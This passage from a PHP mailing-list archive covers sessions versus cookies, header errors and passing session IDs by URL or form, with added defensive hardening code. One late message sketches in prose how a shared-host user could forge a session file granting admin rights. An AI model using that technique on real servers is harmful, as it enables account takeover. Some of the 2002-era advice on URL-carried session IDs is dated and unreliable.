nothing you can do to detect if the request for a particular session comes
from another browser window.


-- 
   O Ernest E. Vogelsinger 
   (\) ICQ #13394035 
^ http://www.vogelsinger.at/


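For comparison with Ernest's php.ini line, an added example (editor's code, not Ernest's) of the opposite configuration. Carrying the session id in the URL does give each window its own session, but the id then appears in browser history, bookmarks, proxy and server logs, and in the Referer header sent to any site the page links to. The settings below accept the id only from the cookie and ignore one found in the URL; the trade-off is exactly what Sidar observed, one session per browser. They are applied with ini_set() so they can be tried per script; the same keys go in php.ini.

```php
<?php
// Added example, editor's code (not Ernest's).
declare(strict_types=1);

// Ernest's php.ini setting, for reference only (not applied here):
//   session.use_cookies = 0     -> the id travels in URLs and form fields
//
// Cookie-only transport. Returns the effective values so the result can be
// checked from the command line or compared with phpinfo().
function hardenSessionTransport(): array
{
    $settings = [
        'session.use_cookies'      => '1',    // send the id in a cookie
        'session.use_only_cookies' => '1',    // and accept it from nowhere else
        'session.use_trans_sid'    => '0',    // do not rewrite URLs/forms to carry it
        'session.use_strict_mode'  => '1',    // refuse ids the server did not issue
        'session.cookie_httponly'  => '1',    // page scripts cannot read the cookie
        'session.cookie_secure'    => '1',    // HTTPS only
        'session.cookie_samesite'  => 'Lax',
    ];
    $effective = [];
    foreach ($settings as $key => $value) {
        ini_set($key, $value);             // all of these are changeable at runtime
        $effective[$key] = ini_get($key);
    }
    return $effective;
}

$effective = hardenSessionTransport();   // must precede session_start()
session_start();

// With use_only_cookies on, a request that carries ?PHPSESSID=... in its URL
// gets a new session instead of resuming the one named in the URL.
print_r($effective);
```

use_strict_mode is the one setting here that the 2003 thread could not have used; it makes PHP discard an id it has no record of instead of creating a session under it, which closes the gap Justin describes when the id is passed around manually.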




Re: [PHP] Sessions and Cookies

2003-02-05 Thread 1LT John W. Holmes
 I'm trying to use cookies in PHP4 (.whatever the latest release is).  I want
 to use them for validation (ensuring a user has logged in) but all I can find
 is setcookie, which seems only to create the cookie.  In trying to use PHP
 sessions, I end up with odd errors.

 When I try to use sessions I get the error message the header has already
 been sent.  I've pasted them below (I was getting different errors before I
 moved the code before the <html> tag).

 Warning: Cannot send session cookie - headers already sent by (output
 started at /home/allan/public_html/sestest2.php:10) in
 /home/allan/public_html/verifysession.php on line 6

 Warning: Cannot send session cache limiter - headers already sent (output
 started at /home/allan/public_html/sestest2.php:10) in
 /home/allan/public_html/verifysession.php on line 6

session_start() must be before <html>. Solve those problems first because
sessions are going to be a better solution than a cookie.

 My Questions:
 If I create a cookie with set_cookie how do I read it/check it?

Whatever you name the cookie, say 'MyCookie', on the following pages from
where you set it, you'll have a $_COOKIE['MyCookie'] variable with it's
value. Use that variable just like you would any other.

 How do I use sessions if they can't be sent in the code?

They must be started before output. You can use the values within your code
and set/change values within your code.

 What use are sessions if I can only mess with them in one place?  What if
I
 need to do some processing first to decide what to do with them?

No problem, see above.

---John Holmes...






[PHP] Sessions and Cookies

2003-02-04 Thread acleave
I'm trying to use cookies in PHP4 (.whatever the latest release is).  I want 
to use them for validation (ensuring a user has logged in) but all I can find 
is setcookie, which seems only to create the cookie.  In trying to use PHP 
sessions, I end up with odd errors.

When I try to use sessions I get the error message the header has already been 
sent.  I've pasted them below (I was getting different errors before I moved 
the code before the <html> tag).

Warning: Cannot send session cookie - headers already sent by (output started 
at /home/allan/public_html/sestest2.php:10) in 
/home/allan/public_html/verifysession.php on line 6

Warning: Cannot send session cache limiter - headers already sent (output 
started at /home/allan/public_html/sestest2.php:10) in 
/home/allan/public_html/verifysession.php on line 6


My Questions:
If I create a cookie with set_cookie how do I read it/check it?

How do I use sessions if they can't be sent in the code?

What use are sessions if I can only mess with them in one place?  What if I 
need to do some processing first to decide what to do with them?

Any insight is welcome.

Allan Cleaveland
Webmaster and Computer Technician
Math Department
University of Arkansas






Re: [PHP] Sessions and Cookies

2003-02-04 Thread Leif K-Brooks


acleave wrote:


> My Questions:
> If I create a cookie with set_cookie how do I read it/check it?
 

$_COOKIE superglobal array.


> How do I use sessions if they can't be sent in the code?


The session_start function has to be at the VERY top of the code, 
below ANY output (even blank spaces and new lines).

> What use are sessions if I can only mess with them in one place?  What if I 
> need to do some processing first to decide what to do with them?

You can use them anywhere in your code, but the session_start function 
has to be before any output (the rest can be anywhere).
--

The above message is encrypted with double rot13 encoding.  Any unauthorized attempt to decrypt it will be prosecuted to the full extent of the law.







Re: [PHP] Sessions and Cookies

2003-02-04 Thread Dmitri
Well, that is natural - cookies can only be set before any output is
produced by the script. And since sessions in this case use cookies, it
follows that sessions can also be started before any output is produced.
Why is that? Because cookies are transmitted by means of http headers, and
http headers precede any content.

The approach I find works extremely well is using some kind of design of the
scripts, such that the script does some analysis of the situation at the
very beginning, processes, saves/loads any data and only then proceeds to
display the results.
Otherwise, you might want to use buffering. See manual for ob_start():

This function will turn output buffering on. While output buffering is
active no output is sent from the script (other than headers), instead the
output is stored in an internal buffer.
---
So you can use it at the beginning of your scripts.
Also, see the config file, php.ini, there is a directive that allows you to
enable it globally without modifying scripts:
---
; Output buffering allows you to send header lines (including cookies) even
; after you send body content, at the price of slowing PHP's output layer a
; bit.  You can enable output buffering during runtime by calling the output
; buffering functions.  You can also enable output buffering for all files by
; setting this directive to On.  If you wish to limit the size of the buffer
; to a certain size - you can use a maximum number of bytes instead of 'On', as
; a value for this directive (e.g., output_buffering=4096).
output_buffering = On
---

Yours truly,
--Dmitri
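The "analyse first, display last" layout Dmitri describes, as an added example that is not code from the thread: session_start() and header() run before any output, all decisions are made, and only then is HTML printed. It assumes PHP 7 or later; check_credentials() and its single sample user are constructed stand-ins for a real user store.

```php
<?php
// Added example, not code from the thread. Assumes PHP 7 or later.
// The credential store and check_credentials() are constructed stand-ins.

// 1. session_start() and any header() call must precede the first byte of
//    output, including whitespace before this "<?php" tag. If output cannot
//    be moved, ob_start() as the very first statement (or output_buffering=On
//    in php.ini) buffers it so headers can still be sent.
session_start();

// Hypothetical credential check; a real one would query a user table.
function check_credentials(string $user, string $pass): bool
{
    // constructed sample user with a hashed password
    static $users = null;
    if ($users === null) {
        $users = ['alice' => password_hash('correct horse', PASSWORD_DEFAULT)];
    }
    return isset($users[$user]) && password_verify($pass, $users[$user]);
}

// 2. Analyse the request and finish all processing before printing anything.
$error = null;
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $user = (string) ($_POST['username'] ?? '');
    $pass = (string) ($_POST['password'] ?? '');

    if (check_credentials($user, $pass)) {
        // Issue a fresh ID at login so an ID that existed before
        // authentication (e.g. one copied from a URL) does not become the
        // authenticated session.
        session_regenerate_id(true);
        $_SESSION['user'] = $user;
        header('Location: cart.php');   // still legal: nothing printed yet
        exit;
    }
    $error = 'Login failed.';
}

// 3. Only now produce output. headers_sent() reports the file and line where
//    output began, which is what the warnings quoted in this thread point at.
if (headers_sent($file, $line)) {
    error_log("output already started at $file:$line");
}
?>
<!DOCTYPE html>
<html>
<head><title>Login</title></head>
<body>
<?php if ($error !== null): ?>
  <p><?= htmlspecialchars($error, ENT_QUOTES, 'UTF-8') ?></p>
<?php endif; ?>
<form method="post" action="">
  <label>Username <input type="text" name="username"></label>
  <label>Password <input type="password" name="password"></label>
  <input type="submit" value="Log in">
</form>
</body>
</html>
```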










Re: [PHP] Sessions or Cookies?

2003-01-18 Thread Chris Hewitt
Peter Janett wrote:


Sessions themselves use cookies, though, right?  So, if you want your app to
work for those who don't have cookies, you have to pass the session data in
the url string, at least that's my understanding.


With sessions, its only the session ID that is put in the cookie or url 
string. The session data stays on the server (usually in a file in 
/tmp). Its more secure than putting your data out to the client browser 
where it could be altered before being returned.

Regards

Chris





Re: [PHP] Sessions or Cookies?

2003-01-18 Thread Brad Pauly
> Sessions themselves use cookies, though, right?  So, if you want your app to
> work for those who don't have cookies, you have to pass the session data in
> the url string, at least that's my understanding.

Cookies are used by default. However, if cookies are disabled in a
client, a session identifier will be passed via URL variable unless
session.use_only_cookies is enabled in php.ini.

Brad







Re: [PHP] Sessions or Cookies?

2003-01-18 Thread Chris Shiflett
--- Peter Janett [EMAIL PROTECTED] wrote:
> Sessions themselves use cookies, though, right?
> So, if you want your app to work for those who
> don't have cookies, you have to pass the session
> data in the url string, at least that's my
> understanding.

That's not quite right.

Session management requires an existing method of state
management. The default state management mechanism used by
PHP is indeed cookies, but that is not the only way. All
that is required for state management is that you assign
the Web client a unique identifier that it includes on
subsequent requests. Cookies make this easy and are
somewhat automatic in PHP, but GET and POST variables can
also be used.

For example, say you normally depend on a cookie to
identify the client. This will probably be something like
PHPSESSID=12345. The following link would send the same
unique identifier as a GET variable:

<a href="./example.php?PHPSESSID=12345">Click Here</a>

Unless you have PHP configured to only use cookies to
identify the client (which I think is not the default
setting anyway), it will use the PHPSESSID when sent on the
URL like this. In fact, you can configure PHP to append the
unique identifier to the URL automatically if the client
does not accept cookies. Just set session.use_trans_sid to
1 in your php.ini file if you compiled PHP with
--enable_trans_sid.

As I hope is clear, none of this requires that any client
data be passed on the URL, in cookies, or anything else.
The only data that should be sent by the client is data
necessary for client identification. All other data can
(and should in most cases) be stored on the server.

Chris
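Chris's rule that only the identifier leaves the server, applied to the shopping-cart question that started this thread. This is an added example, not code from the thread: a cart kept in a cookie beside a cart kept in server-side session storage, with the session configured to carry the ID in a cookie only. It assumes PHP 7.1 or later (so the ini_set() calls can precede session_start()); the catalogue and price lookup are constructed stand-ins for a database.

```php
<?php
// Added example, not code from the thread. Assumes PHP 7.1 or later (the
// ini_set() calls must run before session_start()). The catalogue and
// $price_for closure are constructed stand-ins for a product table.

// Weak: the cart, price included, is stored in a cookie. Everything in it
// comes back from the client, so the server would be trusting the client for
// the price (and is limited to roughly 4 KB per cookie).
function add_to_cart_cookie(string $sku, float $price): void
{
    $cart = json_decode($_COOKIE['cart'] ?? '[]', true);
    if (!is_array($cart)) {
        $cart = [];
    }
    $cart[] = ['sku' => $sku, 'price' => $price];
    setcookie('cart', json_encode($cart));
}

// Preferred: the client only ever carries the session identifier.
function start_session_cookie_only(): void
{
    // Keep the ID out of URLs, where it would land in bookmarks, Referer
    // headers and proxy logs; this is the use_only_cookies setting the
    // thread mentions, plus trans_sid switched off explicitly.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.cookie_httponly', '1');   // not readable from page scripts
    session_start();
}

// The client chooses only SKU and quantity; the price is looked up
// server-side when the cart is displayed or the order is placed.
function add_to_cart_session(string $sku, int $qty): void
{
    if (!isset($_SESSION['cart'])) {
        $_SESSION['cart'] = [];
    }
    $_SESSION['cart'][$sku] = ($_SESSION['cart'][$sku] ?? 0) + $qty;
}

function cart_total(array $cart, callable $price_for): float
{
    $total = 0.0;
    foreach ($cart as $sku => $qty) {
        $total += $price_for($sku) * $qty;
    }
    return $total;
}

// Constructed catalogue standing in for a product table.
$catalogue = ['book-42' => 9.99, 'pen-7' => 1.50];
$price_for = function (string $sku) use ($catalogue): float {
    if (!isset($catalogue[$sku])) {
        throw new InvalidArgumentException("unknown sku $sku");
    }
    return $catalogue[$sku];
};

start_session_cookie_only();
add_to_cart_session('book-42', 2);
add_to_cart_session('pen-7', 4);
printf("%.2f\n", cart_total($_SESSION['cart'], $price_for));
```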





[PHP] Sessions or Cookies?

2003-01-17 Thread Cesar Aracena
Hi all,

I'm about to create a site where visitors will be able to search, view,
surf and add items to a shopping cart without logging in to the site,
but will need to do that in order to complete the transaction of course.
What I wonder, is what to use to collect information about the items the
visitor has chosen in order to show them in the cart section... Should I
use the no-so-secure old cookies method or should I start a new session
every time a client drops in and handle each cart by session name or ID?

Of course I would rather store every visitor's temporary cart in a long
MySQL DB and not in their Hard Disks because of those 4 Kb of limit
cookies have.

Any suggestions? Thanks in advance,

Cesar L. Aracena
[EMAIL PROTECTED]
[EMAIL PROTECTED]
(0299) 156-356688
Neuquén (8300) Capital
Argentina








Re: [PHP] Sessions or Cookies?

2003-01-17 Thread Chris Shiflett
--- Cesar Aracena [EMAIL PROTECTED] wrote:
> Should I use the no-so-secure old cookies method
> or should I start a new session every time a client
> drops in and handle each cart by session name or ID?

My advice is to only use cookies to identify a Web client.
Any data you want to associate with that Web client (user
data, for example) should be stored on the server -
database, session store, etc.

Chris





RE: [PHP] Sessions or Cookies?

2003-01-17 Thread Daevid Vincent
Agreed. Sessions are much more secure and convenient to use too. Since
it's not reliant on the client to have cookies enabled, that's another
benefit. Plus it's MUCH harder for a client to spoof/alter a session
variable if you use the $_SESSION['myvar'] 







Re: [PHP] Sessions or Cookies?

2003-01-17 Thread Peter Janett
Sessions themselves use cookies, though, right?  So, if you want your app to
work for those who don't have cookies, you have to pass the session data in
the url string, at least that's my understanding.

Peter Janett

New Media One Web Services

New Upgrades Are Now Live!!!
Windows 2000 accounts - Cold Fusion 5.0 and Imail 7.1
Sun Solaris (UNIX) accounts - PHP 4.1.2, mod_perl/1.25,
Stronghold/3.0 (Apache/1.3.22), MySQL 3.23.43

PostgreSQL coming soon!

http://www.newmediaone.net
[EMAIL PROTECTED]
(303)828-9882










[PHP] Sessions and Cookies

2002-10-08 Thread R . Z .

I've just read on MSDN that ASP sessions only work if the client has 
cookies enabled,

Is that true for PHP as well?





Re: [PHP] Sessions and Cookies

2002-10-08 Thread @ Edwin

No.

http://www.php.net/manual/en/ref.session.php

- E






RE: [PHP] Sessions and Cookies

2002-10-08 Thread Jon Haworth

Hi,

> I've just read on MSDN that ASP sessions only work if 
> the client has cookies enabled, Is that true for PHP as well.

No, not if you have session.use_trans_sid = 1 in your php.ini.

Cheers
Jon





Re: [PHP] Sessions and Cookies

2002-10-08 Thread Jason Wong

On Tuesday 08 October 2002 23:34, R. Z. wrote:
> I've just read on MSDN that ASP sessions only work if the client has
> cookies enabled,
>
> Is that true for PHP as well.

Yes.

Note that some browsers actually differentiate between session cookies (stored 
in memory) and 'permanent' cookies (stored on disk).

-- 
Jason Wong - Gremlins Associates - www.gremlins.com.hk
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *

/*
The algorithm to do that is extremely nasty.  You might want to mug
someone with it.
-- M. Devine, Computer Science 340
*/






Re: [PHP] Sessions and Cookies

2002-10-08 Thread 1LT John W. Holmes

> On Tuesday 08 October 2002 23:34, R. Z. wrote:
> > I've just read on MSDN that ASP sessions only work if the client has
> > cookies enabled,
> >
> > Is that true for PHP as well.
>
> Yes.
>
> Note that some browsers actually differentiate between session cookies (stored
> in memory) and 'permanent' cookies (stored on disk).

You don't _have_ to use cookies. Sessions will attempt to use them by
default, but you can configure it to not use cookies at all.

If you don't use cookies, though, it's up to you to pass the session ID to
each page, through all the links and all the forms. For the session to work,
the session ID must get passed everywhere so it knows what session file to
load. PHP will attempt to rewrite your URLs and forms for you if you compile
it with a certain flag and turn that option on.

More and better info in the manual, of course: http://www.php.net/sessions

---John Holmes...






Re: [PHP] sessions without cookies *or* URLs

2002-10-07 Thread David T-G

John, et al --

...and then John W. Holmes said...
% 
% You can pass the session ID in a form, too. Just use POST, and make it a
% hidden element passed to the next page. 

Yeah, I figured that.


% 
% <input type="hidden" name="PHPSESSID" value="<?=$PHPSESSID?>">
% 
% It's no different than passing it in the URL. I hope you're not thinking

Except the URL is cleaner :-)


% that it's more secure by doing it this way. Either way the data is
% coming from the user and it can't be trusted and it can be modified. 

Agreed.


% 
% I don't know what this phobia is about passing something in the URL...

First, it's just plain cluttered :-)  Second, though, it would be nice to
not put the user's password right in the URL to then hang out in his
browser goto cache, so we have to change *something*, and if we can
clean up the URL while we're at it that would be nice.


% 
% ---John Holmes...


Thanks & HAND

:-D
-- 
David T-G  * It's easier to fight for one's principles
(play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie
(work) [EMAIL PROTECTED]
http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg!






Re: [PHP] sessions without cookies *or* URLs

2002-10-07 Thread David T-G

Justin, et al --

...and then Justin French said...
% 
% on 07/10/02 11:32 AM, David T-G ([EMAIL PROTECTED]) wrote:
% 
%  It's a start; it confirms some of what I think I understand about
%  sessions.  Now if only I can get the session ID out of the URL without
%  using any cookies...  Any ideas, anyone?
% 
% 
% I Thought I made it clear, but I'll try again :)

Thanks :-)


% 
% You have three options for maintaining state:
% 
% - Cookies
% - URL
% - POSTed forms

OK.  I was afraid of that...


% 
% The most common method is plain cookies.  But if you want guaranteed state,

Sure, but I know that cookies won't work, so that rules them out.


% then URL is the answer.  My main problem with the URL method is that it
% requires the writer(s) to be careful when typing links... ensuring that they

Exactly.  It's cluttered and you have to be sure to get it right if
you're typing it in.


% have the session ID in them.  Impossible for a CMS.  The answer is
% enable_trans_sid.

Well, sorta :-)


% 
% More and more hosts are compiling with enable_trans_sid... what this does
% is: attempt to pass the SID around in a cookie.  If this fails, it will

Right.


% re-write any relative URLs in your pages to include the session ID... it's

So I can code without having to put the ID on the URLs myself?  So the
transparent-ness is for the programmer?  Well, I do like that...


% the best of both worlds... transparent cookies if possible, otherwise the
% SID is passed around in a URL.

Right.


% 
% 
% So, this rules out a complaint about complicated URLs, because you don't
% have to type them.

I may not have to type it as a programmer, but the user might have to
type it as a surfer.


% 
% 
% I urge you to look around all the big sites... if they need to maintain
% state (a session) they do so with URLs... amazon.com, whatever -- they all
% do it.

Yeah, I know.


% 
% Why do you not wish to use URLs?

Because they're cluttered and it puts the session ID also in the user's
goto cache.


% 
% 
% Justin


Thanks & HAND

:-D
-- 
David T-G  * It's easier to fight for one's principles
(play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie
(work) [EMAIL PROTECTED]
http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg!






Re: [PHP] sessions without cookies *or* URLs

2002-10-07 Thread Justin French

on 07/10/02 7:18 PM, David T-G ([EMAIL PROTECTED]) wrote:


> % re-write any relative URLs in your pages to include the session ID... it's
>
> So I can code without having to put the ID on the URLs myself?  So the
> transparent-ness is for the programmer?  Well, I do like that...

Yes.


> % So, this rules out a complaint about complicated URLs, because you don't
> % have to type them.
>
> I may not have to type it as a programmer, but the user might have to
> type it as a surfer.

Nope.  Why would they type it?  The session is managed by PHP's session
functions... if 'page.php' has a session_start() call, it will assign a
PHPSESSID.

Yes, they may accidentally bookmark or favourite a session ID, and you'd
have to read up / test on the implications of this, but given there are only
three options, you have to work through them.

If they work for amazon, they can work for you... If you rule out cookies
and POST, then guess what you're left with :)


Justin









RE: [PHP] sessions without cookies *or* URLs

2002-10-07 Thread John W. Holmes

> % The most common method is plain cookies.  But if you want guaranteed state,
>
> Sure, but I know that cookies won't work, so that rules them out.

Won't work, or you don't want to use them?

> % So, this rules out a complaint about complicated URLs, because you don't
> % have to type them.
>
> I may not have to type it as a programmer, but the user might have to
> type it as a surfer.

Why would the user have to type in a URL with a session id? Your session
ids are only good while the user is active and they will expire after a
certain amount of time. 

> % Why do you not wish to use URLs?
>
> Because they're cluttered and it puts the session ID also in the user's
> goto cache.

Again, why does that matter because that ID is only good while the user
is active. When they log out, it's worthless, or after a certain amount
of inactive time, it's worthless...

---John Holmes...







[PHP] sessions without cookies *or* URLs

2002-10-06 Thread David T-G

Hi, all --

I've seen a recent flurry of discussion on sessions, and that's good;
lovely how that has shown up just as I need to dig into sessions.  I
think I've come to understand, though, that you can't manage sessions
without either URL extensions or cookies, and that's bad (for me, at
least).

Is that a correct understanding?  It seems that using forms to pass the
session token would work, but that means having all buttons instead of
links, which has its own disadvantages.  Is there any other way to get
data to the server?

We currently use the URL to pass variables but we don't want to hang the
page password out there :-) and so we have to move away from that somehow,
and it would be nice if we could get away from URL mangling entirely.
Cookies aren't an option, though.


TIA & HAND

:-D
-- 
David T-G  * It's easier to fight for one's principles
(play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie
(work) [EMAIL PROTECTED]
http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg!






Re: [PHP] sessions without cookies *or* URLs

2002-10-06 Thread Justin French

I think you're under a little misconception about how sessions are used.
Maintaining a session is simply just having a unique identifier for each
user, so that the server can recognise the user from page to page,
maintaining state.

Typically this is done by passing a session id around in the URL or cookies
or POSTing forms.  A session ID is typically a long unique number -- that's
it.


What you then do associate or register data TO that Session ID... this data
is stored on the SERVER, and NOT passed around in the URL.


So you pass around PHPSESSID=198235021612423 in the url or a cookie, and
assign data to that session... all of which is stored server side.

The session with the id 198235021612423 may have a username, password, shoe
size, favourite colour, etc etc all attached to it, done with either:

$_SESSION['shoesize'] = 14; // new register globals OFF method

or

$shoesize = 14;
session_register("shoesize"); // old method


Therefore, I can see no need for anything other than the session ID to be
passed around in the URL.

Hope this clears it up!


Justin French













Re: [PHP] sessions without cookies *or* URLs

2002-10-06 Thread David T-G

Justin, et al --

...and then Justin French said...
% 
% I think you're under a little misconception about how sessions are used.

Perhaps.  I'm new to them :-)


% Maintaining a session is simply just having a unique identifier for each
% user, so that the server can recognise the user from page to page,
% maintaining state.

Right.  And since it can recognize the user, it can store all sorts of
things for him, like the fact that he's been authenticated and what
function he did last and so on.  Right?


% 
% Typically this is done by passing a session id around in the URL or cookies
% or POSTing forms.  A session ID is typically a long unique number -- that's
% it.

Right.  But it's the in the URL or cookies that's a problem for me.


% 
% 
% What you then do associate or register data TO that Session ID... this data
% is stored on the SERVER, and NOT passed around in the URL.

I understand enough that the data itself isn't in the URL, and that's
good (because some of these page comments get long!).


% 
% 
% So you pass around PHPSESSID=198235021612423 in the url or a cookie, and
% assign data to that session... all of which is stored server side.

Are those the only ways that I can pass it around?  Is there anything
else?  [Note that I've come to the conclusion that they are and there
isn't except perhaps a POST form, but I'd love to be pleasantly surprised.]


% 
% The session with the id 198235021612423 may have a username, password, shoe
% size, favourite colour, etc etc all attached to it, done with either:

Good deal; that's what I like.


% 
% $_SESSION['shoesize'] = 14; // new register globals OFF method
% 
% or
% 
% $shoesize = 14;
% session_register("shoesize"); // old method

Right.


% 
% 
% Therefor, I can see no need for anything other than the session ID to be
% passed around in the URL.
% 
% Hope this clears it up!

It's a start; it confirms some of what I think I understand about
sessions.  Now if only I can get the session ID out of the URL without
using any cookies...  Any ideas, anyone?


% 
% 
% Justin French


TIA & HAND

:-D
-- 
David T-G  * It's easier to fight for one's principles
(play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie
(work) [EMAIL PROTECTED]
http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg!






RE: [PHP] sessions without cookies *or* URLs

2002-10-06 Thread John W. Holmes

You can pass the session ID in a form, too. Just use POST, and make it a
hidden element passed to the next page. 

<input type="hidden" name="PHPSESSID" value="<?=$PHPSESSID?>">

It's no different than passing it in the URL. I hope you're not thinking
that it's more secure by doing it this way. Either way the data is
coming from the user and it can't be trusted and it can be modified. 

I don't know what this phobia is about passing something in the URL...

---John Holmes...









Re: [PHP] sessions without cookies *or* URLs

2002-10-06 Thread Justin French

on 07/10/02 11:32 AM, David T-G ([EMAIL PROTECTED]) wrote:

> It's a start; it confirms some of what I think I understand about
> sessions.  Now if only I can get the session ID out of the URL without
> using any cookies...  Any ideas, anyone?


I Thought I made it clear, but I'll try again :)

You have three options for maintaining state:

- Cookies
- URL
- POSTed forms

The most common method is plain cookies.  But if you want guaranteed state,
then URL is the answer.  My main problem with the URL method is that it
requires the writer(s) to be careful when typing links... ensuring that they
have the session ID in them.  Impossible for a CMS.  The answer is
enable_trans_sid.

More and more hosts are compiling with enable_trans_sid... what this does
is: attempt to pass the SID around in a cookie.  If this fails, it will
re-write any relative URLs in your pages to include the session ID... it's
the best of both worlds... transparent cookies if possible, otherwise the
SID is passed around in a URL.


So, this rules out a complaint about complicated URLs, because you don't
have to type them.


I urge you to look around all the big sites... if they need to maintain
state (a session) they do so with URLs... amazon.com, whatever -- they all
do it.

Why do you not wish to use URLs?


Justin


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
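The two transports Justin contrasts (cookie with URL fallback versus cookie only) are controlled by a handful of ini settings, and hand-written links need PHP's SID constant when the URL transport is in play. The following is an added example, not code from the thread; configure_session_transport() and link_with_sid() are names chosen here, SID and the session.* settings are PHP's own, and it assumes the host lets these settings be changed at runtime (otherwise they belong in php.ini or .htaccess).

```php
<?php
// Added example, not from the thread. Run before session_start(): ini_set()
// has no effect on a session that is already running.
function configure_session_transport(bool $allow_url_fallback): void
{
    if ($allow_url_fallback) {
        // "Best of both worlds" from the post: cookie if the browser accepts
        // it, otherwise PHP rewrites relative URLs and form actions to carry
        // PHPSESSID (this is what session.use_trans_sid switches on).
        ini_set('session.use_cookies', '1');
        ini_set('session.use_only_cookies', '0');
        ini_set('session.use_trans_sid', '1');
    } else {
        // Cookie only: PHP ignores a session ID arriving in the query string.
        // IDs carried in URLs end up in proxy logs, browser history and the
        // Referer header sent to other sites, so this is the setting to
        // prefer when the session guards anything sensitive.
        ini_set('session.use_only_cookies', '1');
        ini_set('session.use_trans_sid', '0');
    }
}

// Hand-written links still need the ID when the URL transport is in use.
// SID is the constant PHP defines after session_start(): "PHPSESSID=..."
// when the ID had to go in the URL, or "" when the cookie did the job.
function link_with_sid(string $relative_url): string
{
    if (!defined('SID') || SID === '') {
        return $relative_url;
    }
    $sep = (strpos($relative_url, '?') === false) ? '?' : '&';
    return $relative_url . $sep . htmlspecialchars(SID, ENT_QUOTES, 'UTF-8');
}

configure_session_transport(true);
session_start();
echo '<a href="' . link_with_sid('next.php') . '">next</a>';
```

With the fallback enabled, a browser that accepts the cookie gets a plain `next.php` link; one that refuses it gets `next.php?PHPSESSID=...`, which is exactly the behaviour Justin describes for enable_trans_sid, applied to a link the CMS did not rewrite.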




[PHP] Sessions without cookies : forms

2002-07-22 Thread PHPCoder

Hi, thanks for all the replies on my two previous postings relating to 
sessions and cookies.
I have set my mind on using sessions but without cookies, so that 
entails passing the SID via relative URL's.
My problem comes in here, when I create a simple login page with a form 
that send username and password to the next page, I start_session(); and 
then in the form action, I append the url with <?=SID?> , but that 
causes two parse errors.

Warning: Cannot send session cookie - headers already sent by (output 
started at /home/www/index.php:3) in /home/www/index.php on line 4
 
Warning: Cannot send session cache limiter - headers already sent 
(output started at /home/www/index.php:3) in /home/www/index.php on line 4
 
The code is like so:
<html>
<head>
<?php
session_start();
?>
   
</head>
<body>
<form name="form1" method="post" action="admin_select_project.php?<?=SID?>">
  <table border="0" cellspacing="0" cellpadding="0">
<tr bgcolor="#CFCFCF">
  <td colspan="2">Admin Login
  </td>
</tr>
<tr>
  <td>Username:
  </td>
  <td><input type="text" name="username">
  </td>
</tr>
<tr>
  <td>Password:
  </td>
  <td><input type="text" name="password">
  </td>
</tr>
<tr>
  <td>
<input type="submit" name="Submit4" value="Submit">
  </td>
</tr>
  </table>
</form>
</body>
</html>
What am I missing...

Thanks



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions without cookies : forms

2002-07-22 Thread Richard Baskett

You need to start the session before any html.  So:

<?php session_start(); ?>
<html>

Cheers!

Rick

Too much caution is bad for you. By avoiding things you fear, you may let
yourself in for unhappy consequences. It is usually wiser to stand up to a
scary-seeming experience and walk right into it, risking the bruises as hard
knocks. You are likely to find it is not as tough as you had thought.  Or
you may find it plenty tough, but also discover you have what it takes to
handle it. - Norman Vincent Peale

 From: PHPCoder [EMAIL PROTECTED]
 Date: Mon, 22 Jul 2002 08:36:44 +0200
 To: php-general [EMAIL PROTECTED]
 Subject: [PHP] Sessions without cookies : forms
 
 Hi, thanks for all the replies on my two previous postings relating to
 sessions and cookies.
 I have set my mind on using sessions but without cookies, so that
 entails passing the SID via relative URL's.
 My problem comes in here, when I create a simple login page with a form
 that send username and password to the next page, I start_session(); and
 then in the form action, I append the url with <?=SID?> , but that
 causes two parse errors.
 
 Warning: Cannot send session cookie - headers already sent by (output
 started at /home/www/index.php:3) in /home/www/index.php on line 4
 
 Warning: Cannot send session cache limiter - headers already sent
 (output started at /home/www/index.php:3) in /home/www/index.php on line 4
 
 The code is like so:
 <html>
 <head>
 <?php
   session_start();
 ?>
  
 </head>
 <body>
 <form name="form1" method="post" action="admin_select_project.php?<?=SID?>">
 <table border="0" cellspacing="0" cellpadding="0">
   <tr bgcolor="#CFCFCF">
 <td colspan="2">Admin Login
 </td>
   </tr>
   <tr>
 <td>Username:
 </td>
 <td><input type="text" name="username">
 </td>
   </tr>
   <tr>
 <td>Password:
 </td>
 <td><input type="text" name="password">
 </td>
   </tr>
   <tr>
 <td>
   <input type="submit" name="Submit4" value="Submit">
 </td>
   </tr>
 </table>
 </form>
 </body>
 </html>
 What am I missing...
 
 Thanks
 
 
 
 -- 
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php
 


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




RE: [PHP] Sessions / logins / cookies / security

2002-07-17 Thread John Holmes

  Sure, why not? Users can't create session variables (unless you're on a
  virtual server...)
 
 ... and I am -- A shared host server that is.

Now I'm not sure on this, I haven't tested it. Has anyone?

If we're on a virtual server, why can't I just open the
session.save_path with PHP and read all of the files. Determine which
one is yours and try to determine which variables you are saving. Say
you are setting $_SESSION['logged_in'] = 1 and $_SESSION['admin'] =
Yes. Then your session file will look like a serialized version of the
$_SESSION array. 

So say I figure out which ones are yours. I use a PHP script to write my
own bad_session_file.whatever in the session folder. Then I call up your
web page with www.example.com?PHPSESSID=bad_session_file and PHP will
load up the session file I just created and make me an admin... 

Like I said, I haven't tested it though. Safe mode might protect against
this, not sure. Anyone have any experience here?

---John Holmes...


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] Sessions / logins / cookies / security

2002-07-17 Thread Justin French

